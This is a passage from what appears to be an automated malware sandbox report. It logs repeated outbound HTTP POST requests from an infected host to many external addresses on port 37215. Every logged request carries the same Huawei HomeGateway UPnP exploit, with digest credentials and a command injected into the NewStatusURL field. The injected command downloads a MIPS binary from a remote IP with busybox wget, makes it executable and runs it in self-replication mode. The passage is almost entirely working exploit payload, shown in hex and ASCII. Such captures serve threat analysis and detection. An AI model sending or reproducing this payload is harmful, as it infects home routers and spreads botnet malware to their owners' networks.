                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2262192.168.2.2352362157.11.204.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577810049 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2263192.168.2.2334344197.126.207.2837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577820063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2264192.168.2.2342928157.183.195.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577860117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2265192.168.2.2355442157.38.81.15437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577912092 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2266192.168.2.235617841.95.81.10937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578011036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2267192.168.2.2333512197.218.35.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578036070 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2268192.168.2.2353026197.74.222.18637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578049898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2269192.168.2.2338924189.52.214.9937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578051090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2270192.168.2.2353266157.14.183.23837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578051090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2271192.168.2.2335240188.236.143.8837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578051090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
